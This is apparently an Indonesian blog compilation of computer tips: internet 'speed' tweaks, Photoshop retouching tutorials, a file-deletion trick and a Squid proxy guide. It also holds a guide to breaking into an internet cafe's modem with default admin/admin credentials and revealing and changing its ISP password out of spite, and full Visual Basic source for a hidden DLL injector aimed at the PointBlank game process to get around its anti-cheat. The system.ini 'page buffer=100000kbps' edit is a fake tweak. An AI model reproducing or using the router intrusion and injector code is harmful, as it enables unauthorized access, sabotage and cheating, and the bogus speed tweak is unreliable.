Cara Mempercepat Koneksi Internet

1. Klik Buton Start Komputer Anda anda dan pilih Menu "Run"
2. Setelah Masuk Menu "Run" anda Ketik "system.ini"
3. Setelah Terbuka nanti ada Tulisan Seperti di bawah ini
    ; for 16-bit app support
    [drivers]
    wave=mmdrv.dll
    timer=timer.drv
    [mci]
    [driver32]
    [386enh]
    woafont=dosapp.FON
    EGA80WOA.FON=EGA80WOA.FON
    EGA40WOA.FON=EGA40WOA.FON
    CGA80WOA.FON=CGA80WOA.FON
    CGA40WOA.FON=CGA40WOA.FON

4  Tambahkan dengan tulisan yang dibawah ini pada bagian bawah poin 3 di atas
    page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps
5. Nanti Hasilnya Seperti yang Tertera dibawah ini.
    ; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=100000kbps load=100000kbps download=100000kbps save=100000kbps back=100000kbps
6. save dan exit notepad system.ini



Cara Kedua:

TWEAK REGISTRY
Tweak registry dilakukan dalam registry windows Anda, caranya :
1. Pilih menu start kemudian run
2. Ketikkan regedit pada jendela dialog run
Tips Mempercepat Koneksi Internet
3. Carilah alamat registry ini : HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Services\Tcpip\ServiceProvider kemudian lakukan cara 4-7

4. Pilih DnsPriority ubah nilainya menjadi 1
5. Pilih HostsPriority ubah nilainya menjadi 1
6. Pilih LocalPriority ubah nilainya menjadi 1
7. Pilih NetbtPriority ubah nilainya menjadi 1
8. Close Registry Editor
9. Restart Komputer Anda

 Selamat Mencoba
 

Memperhalus Foto Handphone Resolusi Rendah

                                                                                                          Ini Juga Copas Dari Blog Tetangga


Dipostingan ini saya membahas cara memperhalus foto yg resolusinya rendah.. fotonya ada bintik-bintik karena diambil dengan handphone yang resolusi rendah.. ternyata bisa dibenerin, walaupun gak full bagus.. tapi dengan sedikit usaha bisa diminimalisis noisenya...


Gini nih cara nya :

pertama buka file fotonya




Tekan CTRL + J untuk menduplikat.. untuk memperbandingan hasil nya nanti.. di layer hasil duplikat Klik Filter > Noise>Reduce Noise


foto-hp21
Sekarang duplikat lagi layer 1 ( layer yang barusan di edit )


Klik Filter > Blur > gaussian Blur
Setting dengan Radius 1




Lalu Ganti effect layer menjadi SOFT LIGHT


Hasilnya :


Perbandingan :


Lumayan ter reduksi kan?
Silahkan coba..
Terima kasih......
 

Cara menghaluskan Wajah dengan Photoshop

Meskipun Ini Copas Tapi Ini Sangat Berguna Bagi Anda Yg
Mempunyai Wajah Yg Kurang Bersih                     Wkwkwkwk

Yah Langsung Aja Ok ..!!

di tutorial photoshop yang lama saya sudah buat cara menghaluskan wajah yang judulnya menghilangkan kerutan di wajah.. di tutorial itu saya pake cara healing brush tool..
Sekarang saya mau coba dengan cara lain menghilangkan jerawat atau menghaluskan muka tanpa meng clone ataupun healing.. tapi dengan blur filter.
Buka foto yang mau dihaluskan wajahnya..

duplikat layer background atau layer gambar dengan menekan ctrl + J
ubah layer style menjadi vivid light.

Klik Image > adjustment > Invert atau tekan CTRL + I

Klik filter > blur > gaussian blur
Nilai radius tergantung gambar.. usahakan hasil blur nya sama yaa dengan yang digambar

Klik filter > other > high pass .. sekali lagi nilai radius tergantung besar gambar nya.. jadi dikira-kira aja wajahnya udah mulus apa belom.. :).. kalo ada perubahan pada mata.. biarin aja.. nanti dimasking kok..

Kalo udah keliatan halus muka nya.. klik Add layer mask ..
warna foreground harus hitam..

Klik brush TooL .. warnai bagian-bagian yang harusnya tajem.. seperti alis, mata, bibir, hidung, rambut, baju… kecuali daerah yang ada jerawarnya.. jangan di masking.

hasilnya :

Ini contoh yang lain :

Gimana ? gampang kan ?
Selamat mencoba yah..

 

Cara Hack Password Telkom Speedy

Untuk Kalian Yang Kesal Terhadap Suatu Warnet, 
Kalian Bisa Menjahilinya( Membunuh ) Dengan Mengganti
Password SpeedyNya ..!!   (^^^)
Tapi Kalian Harus Tanggung Akibatnya.....Yaitu :
                        •)Akan Senantiasa Di Hantui Dengan Dosa Yang Engkau KerjakanNaah Langsung Aja Ke caranya :
•)Anda Scan Ip Adress Warnet Target

•)Lalu  Instal Add ons Firefox Yang Bernama Unhide Atau Kunjungi
  https://addons.mozilla.org/en-us/firefox/addon/unhide-passwords/

  Lalu Instal Hingga Selesai
•)Lalu Masuk Ke Modem Nya Dengan Cara ( Ketikan ip adress Admin<Modem> Di Adress Bar=Contoh' 192.168.1.1)  "Biasanya Pemilik Warnet Bodoh Menggunakan Ip Adress Itu"
•)Nanti Akan Muncul Menu Pop Up Dan Kalian Isikan Dengan
  username : Admin
  Password: Admin
 Jika Sukses Anda Telah Berhasil Ke settingan Modem Warnet Itu
 •)Klik Menu Kedua 

 
•)Nah Jika Anda Sudah Menginstal Unhide password,
  Maka Pasword Yang Tadinya ••••••• Berbah Menjadi Text Biasa
•)Jika Sudah Tau Kita Pergi Ke  Forum Speedy Atau Ini
•)Lalu Klik Lihat Gambar Ini
Nah Jika Sudah Sampai Sini Kalian Pasti Bisa Denagn Sendirinya

Semoga Anda Masuk Ke Neraka


 


Credit : Wheldt

 

Cara Menghilangkan File Yang Sangat Susah Untuk Dihapus

Hallooooo..!!!!!
Karena Banyak Yang Minta Cara Menghapus File Yang Susah Untuk Dihapus,

Maka Saya Membuat Entri Ini...!!! Ok..!! Lets Go
"Apakah Kalian Pernah Menggunakan Unlocker Atau Semacamnya  ?
  Jika Sudah Yaa G*Pha²"
Naah Ini Adalah Cara Menghapus File Yang Benar²

Tidak Dapat Di Hapus Dengan Cara Apapun..
Taapii..Sewaktu Flashdisk Saya Penuh, Saya Ingin

Sekali Menghapus Salah Satu Folder Yang Berisi
File Unknown Yang Sangat Bandel, Bahkan
Dengan Cara Apapun Tidak Bisa...

Disini Saya Akan Memberitahu Kepada Pembaca Setia
Blog Saya Untuk Membantu Kendala Anda..!!




Bahan² :
-TeraCopy                
[Bisa Di Dongdot Disini]
-Kesabaran
-Juga Persiapkan Hati Yang Tenang Serta Fikiran Yang Dingin

 >>]•)Langsung Ke TutorialNya :

•) Pertama Instal Dulu TeraCopy                   
•) Cut Semua File Yang Ada Di Disk Drive Atau Flash Disk Anda

    Tapi Sisakan File Yg Susah Untuk Di Hapus Itu    [Ke Disk Drive Lain Atau Flash DIsk Lain]
•) Lalu Format Disk Drive Atau Flashdisk Anda         "Mungkin Cara Ini Tidak Terfikirkan Oleh Agan² Semua"
•) Naah Jika Sudah Cut Kembali ( Kembalikan Seperti Semua )
•) Selesai...!!!!

   Note: Cara Ini Otomatis Akan Menghapus Yg Bandel

Semoga Bermanfaat

Created : Wheldt (Dhani-HAcker)

 

Mempercepat Browsing Dengan Squid

Squid layaknya sebuah pembantu untuk proses  mempercepat kegiatan browsing kita, dimana squid bisa menyimpan semua obyek-obyek dari sebuah atau beberapa website ke dalam media lokal dan akan di berikan ketika ada request/permintaan setelah sebelumnya squid melakukan proses kalkulasi. Dalam pengadopsian squid untuk kehidupan nyata sebenarnya relatif, maksudnya disini relatif adalah squid tergantung dari beberapa faktor. antara lain: berapa kecepatan prosesor yang di gunakan sebagai server squid, berapa banyak client yang dilayani oleh squid, berapa cepat squid bisa mencapai client, dan masih banyak lagi faktor-faktor teknis dan non-teknis yang bisa mempengaruhi performance squid.
Namun umumnya squid akan selalu bisa berhasil mempercepat browsing dibanding dengan melakukan browsing dengan menggunakan direct connection. Konfigurasi squid sendiri dapat dibilang mudah-mudah susah, mengingat ini adalah aplikasi opensource kebanyakan tanpa support dan dukungan yang penuh seperti layaknya sebuah software berbayar. Dalam sample dibawah ini saya menggunakan operating system microsoft windows untuk konfigurasinya harap di sesuaikan dengan jaringan masing-masing.
Persiapan:
  1. Download Squid.
  2. buka file ini dan simpan dengan nama “Squid.conf“.
  3. Rubah konfigurasi squid.conf sesuai kebutuhan dan ketersediaan (disk drive)
Setelah semua siap extract squid dan letakkan di drive c: (contoh c:\squid) buka command prompt lalu menuju ke folder c:\squid\sbin ketikkan “squid -z” silahkan di tunggu sebentar squid sedang membangun cache, setelah selesai ketikkan “squid -d 1 D” tunggu sebentar, Setelah itu ketik “squid -i” tunggu hingga selesai.
Setelah semua langkah selesai sekarang waktunya menghidupkan squid klik run lalu ketikkan “services.msc” cari service yang bernama “Squid” setelah itu klik “start this service” setelah itu squid sudah siap untuk di gunakan.
Untuk menggunakan squid sebagai transparent proxy silahkan ganti manual di browser masing-masing contohnya:
Internet Explorer
Tools -> Internet Options -> Connections -> LAN Settings -> centang proxy server, isi address dengan ip tempat kamu menginstall squid, isikan port dengan port yang kamu gunakan untuk squid. Contoh:
Mozilla Firefox
Tolls -> Options -> Advanced -> Network -> Setting -> Manual Proxy Configuration -> isi HTTP Proxy dengan ip tempat kamu menginstall squid, isikan port dengan port yang kamu gunakan untuk squid. Contoh:
Untuk web browser lainnya seperti google chrome, opera, atau lainnya silahkan dicari sendiri umumnya semua punya option proxy. Setelah semua siap silahkan kalian coba sendiri perbedaannya. Pada percobaan saya mencoba mengakses farmville, dengan menggunakan direct connection membutuhkan waktu loading sekitar 4-7 menit. dengan menggunakan squid saya membutuhkan waktu hanya sekitar 1-2 menit. Untuk membuktikannya  bahwa squid benar-benar berfungsi silahkan setelah mencoba membuka sebuah website lalu kalian hapus semua cache internet lalu mencoba membuka lagi untuk mencoba performance squid.
Untuk mengecek apakah cache squid berjalan dengan baik cukup melihat size total dari folder cache kalau terus bertambah setelah sering browsing berarti cache squid sudah berfungsi dengan baik.


CATATAN: Ini bukan teknik mempercepat koneksi internet seperti yang banyak dikacaukan oleh para orang-orang gila, ini hanya teknik mempercepat proses browsing dengan memanfaatkan squid, untuk proses download tidak akan terpengaruh dengan menggunakan squid.
 

Cara Membuat Injector Transparan Image

Bahan-bahan :

[*] Niat
[*] Visual Basic 6 (bisa yang portable, bisa juga yg installable)
[*] gambar berekstensi .png (save as juga dalam format gif sebagai patokan ukuran gambar)



oke lanjut... pertama2 kita buka dulu vb6 nya...
File>New Project Standard EXE

tambahkan 2 buah timer

pada properties form, pilih picture lalu pilih gambar gif mu tadi
dan sesuaikan ukuran form dengan gambar
Posted Image

lalu buat 5 buah modul dan beri nama : basMain, modInjection, modBrowser, modProcess, OnTopCrot
isikan koding berikut kedalamnya


BasMain

Option Explicit

Public Declare Function GdipCreateFromHDC Lib "gdiplus" (ByVal hdc As Long, graphics As Long) As GpStatus
Public Declare Function GdipCreateFromHWND Lib "gdiplus" (ByVal hwnd As Long, graphics As Long) As GpStatus
Public Declare Function GdipDeleteGraphics Lib "gdiplus" (ByVal graphics As Long) As GpStatus
Public Declare Function GdipGetDC Lib "gdiplus" (ByVal graphics As Long, hdc As Long) As GpStatus
Public Declare Function GdipReleaseDC Lib "gdiplus" (ByVal graphics As Long, ByVal hdc As Long) As GpStatus
Public Declare Function GdipDrawImageRect Lib "gdiplus" (ByVal graphics As Long, ByVal image As Long, ByVal x As Single, ByVal y As Single, ByVal Width As Single, ByVal Height As Single) As GpStatus
Public Declare Function GdipLoadImageFromFile Lib "gdiplus" (ByVal fileName As String, image As Long) As GpStatus
Public Declare Function GdipCloneImage Lib "gdiplus" (ByVal image As Long, cloneImage As Long) As GpStatus
Public Declare Function GdipGetImageWidth Lib "gdiplus" (ByVal image As Long, Width As Long) As GpStatus
Public Declare Function GdipGetImageHeight Lib "gdiplus" (ByVal image As Long, Height As Long) As GpStatus
Public Declare Function GdipCreateBitmapFromHBITMAP Lib "gdiplus" (ByVal hbm As Long, ByVal hpal As Long, bitmap As Long) As GpStatus
Public Declare Function GdipBitmapGetPixel Lib "gdiplus" (ByVal bitmap As Long, ByVal x As Long, ByVal y As Long, color As Long) As GpStatus
Public Declare Function GdipBitmapSetPixel Lib "gdiplus" (ByVal bitmap As Long, ByVal x As Long, ByVal y As Long, ByVal color As Long) As GpStatus
Public Declare Function GdipDisposeImage Lib "gdiplus" (ByVal image As Long) As GpStatus
Public Declare Function GdipCreateBitmapFromFile Lib "gdiplus" (ByVal fileName As Long, bitmap As Long) As GpStatus

Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Public Const HTCAPTION = 2
Public Const WM_NCLBUTTONDOWN = &HA1
Public Const WM_SYSCOMMAND = &H112

Public Type GdiplusStartupInput
GdiplusVersion As Long
DebugEventCallback As Long
SuppressBackgroundThread As Long
SuppressExternalCodecs As Long
End Type

Public Declare Function GdiplusStartup Lib "gdiplus" (token As Long, inputbuf As GdiplusStartupInput, Optional ByVal outputbuf As Long = 0) As GpStatus
Public Declare Sub GdiplusShutdown Lib "gdiplus" (ByVal token As Long)

Public Enum GpStatus
Ok = 0
GenericError = 1
InvalidParameter = 2
OutOfMemory = 3
ObjectBusy = 4
InsufficientBuffer = 5
NotImplemented = 6
Win32Error = 7
WrongState = 8
Aborted = 9
FileNotFound = 10
ValueOverflow = 11
AccessDenied = 12
UnknownImageFormat = 13
FontFamilyNotFound = 14
FontStyleNotFound = 15
NotTrueTypeFont = 16
UnsupportedGdiplusVersion = 17
GdiplusNotInitialized = 18
PropertyNotFound = 19
PropertyNotSupported = 20
End Enum


modInjection

Option Explicit
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, _
ByVal lpProcName As String) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal fAllocType As Long, _
flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, _
ByVal lpBaseAddress As Any, _
lpBuffer As Any, _
ByVal nSize As Long, _
lpNumberOfBytesWritten As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, _
lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Any, _
ByVal lpParameter As Any, _
ByVal dwCreationFlags As Long, _
lpThreadID As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)


Public Sub InjectDll(DllPath As String, _
ProsH As Long)


Dim DLLVirtLoc As Long
Dim DllLength As Long

Dim inject As Long
Dim LibAddress As Long
Dim CreateThread As Long
Dim ThreadID As Long
Dim Bla As VbMsgBoxResult
g_loadlibary:
LibAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")
If LibAddress = 0 Then
Bla = MsgBox("Can't find LoadLibrary API from kernel32.dll", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_loadlibary
Else 'NOT BLA...
Exit Sub
End If
End If
g_virutalallocex:
DllLength = Len(DllPath)
DLLVirtLoc = VirtualAllocEx(ProsH, 0, DllLength, &H1000, ByVal &H4)
If DLLVirtLoc = 0 Then
Bla = MsgBox("VirtualAllocEx API failed! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_virutalallocex
Else 'NOT BLA...
Exit Sub
End If
End If
g_writepmemory:
inject = WriteProcessMemory(ProsH, ByVal DLLVirtLoc, ByVal DllPath, DllLength, vbNull)
If inject = 0 Then
Bla = MsgBox("Failed to Write DLL to Process! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_writepmemory
Else 'NOT BLA...
Exit Sub
End If
End If
g_creatthread:
CreateThread = CreateRemoteThread(ProsH, ByVal 0, 0, ByVal LibAddress, ByVal DLLVirtLoc, 0, ThreadID)
If CreateThread = 0 Then
Bla = MsgBox("Failed to Create Thead! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_creatthread
Else 'NOT BLA...
Exit Sub
End If
End If

MsgBox "Crooooot!!!^^", vbCritical, "USn-AutoInjector"

End Sub

Public Sub InjectExecute(ByVal sFlDLL As String)

Dim lProcInject As Long

lProcInject = OpenProcess(PROCESS_ALL_ACCESS, 0, IdTargetOne)
If lProcInject > "0" Then
Call InjectDll(sFlDLL, lProcInject)

End If
Call CloseHandle(lProcInject)


End Sub


modBrowser

Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hwnd As Long, _
ByVal lpOperation As String, _
ByVal lpFile As String, _
ByVal lpParameters As String, _
ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long

Public Sub OpenURL(situs As String, sourceHWND As Long)
Call ShellExecute(sourceHWND, vbNullString, situs, vbNullString, vbNullString, 1)
End Sub


modProcess

Option Explicit
Public FileTarget As String
Public sFlDLL As String
Public IdTargetOne As Long
Private Const TH32CS_SNAPHEAPLIST As Long = &H1
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const TH32CS_SNAPTHREAD As Long = &H4
Private Const TH32CS_SNAPMODULE As Long = &H8
Private Const TH32CS_SNAPALL As Double = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Private Const MAX_PATH As Integer = 260
Public Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Type MODULEENTRY32
dwSize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Long
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 260
End Type
Private Type THREADENTRY32
dwSize As Long
cntUsage As Long
th32ThreadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type
Private Const THREAD_SUSPEND_RESUME As Long = &H2
Private hThread As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, _
ByVal lProcessID As Long) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapShot As Long, _
uProcess As MODULEENTRY32) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function GetFileTitle Lib "COMDLG32.DLL" Alias "GetFileTitleA" (ByVal lpszFile As String, _
ByVal lpszTitle As String, _
ByVal cbBuf As Integer) As Integer
Private Declare Function Thread32First Lib "kernel32.dll" (ByVal hSnapShot As Long, _
ByRef lpte As THREADENTRY32) As Boolean
Private Declare Function Thread32Next Lib "kernel32.dll" (ByVal hSnapShot As Long, _
ByRef lpte As THREADENTRY32) As Boolean
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, _
ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, _
ByVal uExitCode As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal Classname As String, _
ByVal WindowName As String) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
lParam As Any) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, _
uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, _
uProcess As PROCESSENTRY32) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, _
ByVal bInheritHandle As Boolean, _
ByVal dwThreadId As Long) As Long
Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As Long) As Long
Private Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As Long) As Long

Public Function NTProcessList() As Long

Dim fileName As String

Dim ExePath As String
Dim hProcSnap As Long
Dim hModuleSnap As Long
Dim lProc As Long
Dim uProcess As PROCESSENTRY32
Dim uModule As MODULEENTRY32
On Error Resume Next
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
lProc = Process32First(hProcSnap, uProcess)
Do While lProc
If uProcess.th32ProcessID <> 0 Then
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, uProcess.th32ProcessID)
uModule.dwSize = Len(uModule)
Module32First hModuleSnap, uModule
If hModuleSnap > 0 Then
ExePath = StripNulls(uModule.szExePath)
fileName = GetFName(ExePath)
If FileTarget = fileName Then
IdTargetOne = uProcess.th32ProcessID
End If
End If
End If
lProc = Process32Next(hProcSnap, uProcess)
Loop
Call CloseHandle(hProcSnap)
Call CloseHandle(lProc)
On Error GoTo 0

End Function

Private Function StripNulls(ByVal sStr As String) As String


StripNulls = Left$(sStr, lstrlen(sStr))

End Function

Public Function GetFName(fn) As String
Dim f%, n%
GetFName = fn
f% = InStr(fn, "\")
Do While f%
n% = f%
f% = InStr(n% + 1, fn, "\")
Loop
If n% > 0 Then GetFName = Mid$(fn, n% + 1)
End Function

Private Function Thread32Enum(ByRef Thread() As THREADENTRY32, _
ByVal lProcessID As Long) As Long

Dim THREADENTRY32 As THREADENTRY32
Dim hThreadSnap As Long
Dim lThread As Long

On Error Resume Next
ReDim Thread(0) As THREADENTRY32
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, lProcessID)
THREADENTRY32.dwSize = Len(THREADENTRY32)
If Thread32First(hThreadSnap, THREADENTRY32) = False Then
Thread32Enum = -1
Exit Function
Else
ReDim Thread(lThread) As THREADENTRY32
Thread(lThread) = THREADENTRY32
End If
Do
If Thread32Next(hThreadSnap, THREADENTRY32) = False Then
Exit Do
Else
lThread = lThread + 1
ReDim Preserve Thread(lThread)
Thread(lThread) = THREADENTRY32
End If
Loop
Thread32Enum = lThread
Call CloseHandle(hThreadSnap)
On Error GoTo 0

End Function






OnTopCrot

Public Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type

Public Const HWND_TOPMOST = -1
Public Const HWND_NOTOPMOST = -2
Public Const SWP_NOSIZE = &H1

Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long


Form1


Option Explicit

Private Const ULW_OPAQUE = &H4
Private Const ULW_COLORKEY = &H1
Private Const ULW_ALPHA = &H2
Private Const BI_RGB As Long = 0&
Private Const DIB_RGB_COLORS As Long = 0
Private Const AC_SRC_ALPHA As Long = &H1
Private Const AC_SRC_OVER = &H0
Private Const WS_EX_LAYERED = &H80000
Private Const GWL_STYLE As Long = -16
Private Const GWL_EXSTYLE As Long = -20
Private Const HWND_TOPMOST As Long = -1
Private Const SWP_NOMOVE As Long = &H2
Private Const SWP_NOSIZE As Long = &H1
Private Const LWA_ALPHA As Long = &H2
Private winHwnd As Long
Private NamaDll As String

Private Type BLENDFUNCTION
BlendOp As Byte
BlendFlags As Byte
SourceConstantAlpha As Byte
AlphaFormat As Byte
End Type

Private Type Size
cx As Long
cy As Long
End Type

Private Type POINTAPI
x As Long
y As Long
End Type

Private Type RGBQUAD
rgbBlue As Byte
rgbGreen As Byte
rgbRed As Byte
rgbReserved As Byte
End Type

Private Type BITMAPINFOHEADER
biSize As Long
biWidth As Long
biHeight As Long
biPlanes As Integer
biBitCount As Integer
biCompression As Long
biSizeImage As Long
biXPelsPerMeter As Long
biYPelsPerMeter As Long
biClrUsed As Long
biClrImportant As Long
End Type

Private Type BITMAPINFO
bmiHeader As BITMAPINFOHEADER
bmiColors As RGBQUAD
End Type

Private Declare Function BitBlt Lib "gdi32.dll" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function AlphaBlend Lib "Msimg32.dll" (ByVal hdcDest As Long, ByVal nXOriginDest As Long, ByVal lnYOriginDest As Long, ByVal nWidthDest As Long, ByVal nHeightDest As Long, ByVal hdcSrc As Long, ByVal nXOriginSrc As Long, ByVal nYOriginSrc As Long, ByVal nWidthSrc As Long, ByVal nHeightSrc As Long, ByVal bf As Long) As Boolean
Private Declare Function UpdateLayeredWindow Lib "user32.dll" (ByVal hwnd As Long, ByVal hdcDst As Long, pptDst As Any, psize As Any, ByVal hdcSrc As Long, pptSrc As Any, ByVal crKey As Long, ByRef pblend As BLENDFUNCTION, ByVal dwFlags As Long) As Long
Private Declare Function CreateDIBSection Lib "gdi32.dll" (ByVal hdc As Long, pBitmapInfo As BITMAPINFO, ByVal un As Long, ByRef lplpVoid As Any, ByVal handle As Long, ByVal dw As Long) As Long
Private Declare Function GetDIBits Lib "gdi32.dll" (ByVal aHDC As Long, ByVal hBitmap As Long, ByVal nStartScan As Long, ByVal nNumScans As Long, lpBits As Any, lpBI As BITMAPINFO, ByVal wUsage As Long) As Long
Private Declare Function SetDIBits Lib "gdi32.dll" (ByVal hdc As Long, ByVal hBitmap As Long, ByVal nStartScan As Long, ByVal nNumScans As Long, lpBits As Any, lpBI As BITMAPINFO, ByVal wUsage As Long) As Long
Private Declare Function CreateCompatibleDC Lib "gdi32.dll" (ByVal hdc As Long) As Long
Private Declare Function SelectObject Lib "gdi32.dll" (ByVal hdc As Long, ByVal hObject As Long) As Long
Private Declare Function DeleteDC Lib "gdi32.dll" (ByVal hdc As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function SetWindowPos Lib "user32.dll" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Private Declare Function GetWindowLong Lib "user32.dll" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function GetDC Lib "user32.dll" (ByVal hwnd As Long) As Long

Private Declare Function GetWindowLongA Lib "user32" (ByVal hwnd As Long, _
ByVal nIndex As Long) As Long
Private Declare Function SetWindowLongA Lib "user32" (ByVal hwnd As Long, _
ByVal nIndex As Long, _
ByVal dwNewLong As Long) As Long
Private Declare Function SetLayeredWindowAttributes Lib "user32" (ByVal hwnd As Long, _
ByVal crey As Byte, _
ByVal bAlpha As Byte, _
ByVal dwFlags As Long) As Long


Dim mDC As Long
Dim mainBitmap As Long
Dim blendFunc32bpp As BLENDFUNCTION
Dim token As Long
Dim oldBitmap As Long


Private Sub Form_Load()


Dim GpInput As GdiplusStartupInput
GpInput.GdiplusVersion = 1

Dim rc As RECT
GetWindowRect Me.hwnd, rc
SetWindowPos Me.hwnd, HWND_TOPMOST, rc.Left, rc.Top, 0, 0, SWP_NOSIZE ' always on top broooow :lol:

If GdiplusStartup(token, GpInput) <> 0 Then
Unload Me
End If

MakeTrans (App.Path & "\666.png") 'ganti nama file png yang mw d load sesuai keinginanmu
App.TaskVisible = False 'hidden aplikasi dari window taskmanager
'perintah menghindari aplikasi dijalankan 2 kali
'----------------------------------------
If App.PrevInstance Then
MsgBox "udah jalan om...jgn d pencet lagi aduuuuhh...", vbCritical
End
End If
'----------------------------------------
NginjekYuk
End Sub
Private Sub NginjekYuk()
Me.Caption = "beNsix™autoInjexcRot"
NamaDll = App.Path & "\" & "usnet.dll" ' nama dll yang mw d inject
FileTarget = "PointBlank.exe"
Timer1.Interval = 20
End Sub



Private Sub Form_Unload(Cancel As Integer)

Call GdiplusShutdown(token)
SelectObject mDC, oldBitmap
DeleteObject mainBitmap
DeleteObject oldBitmap
DeleteDC mDC

End Sub



Private Sub Timer1_Timer()

winHwnd = FindWindow(vbNullString, "HSUpdate")
If Not winHwnd = 0 Then 'jika ditemukan
NTProcessList 'deteksi process pointblank
InjectExecute (NamaDll) 'inject library
End
Else 'jika tidak
End If
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
OpenURL "http://forum.us-net.org", Me.hwnd
Unload Me

End Sub


Private Sub Timer2_Timer()
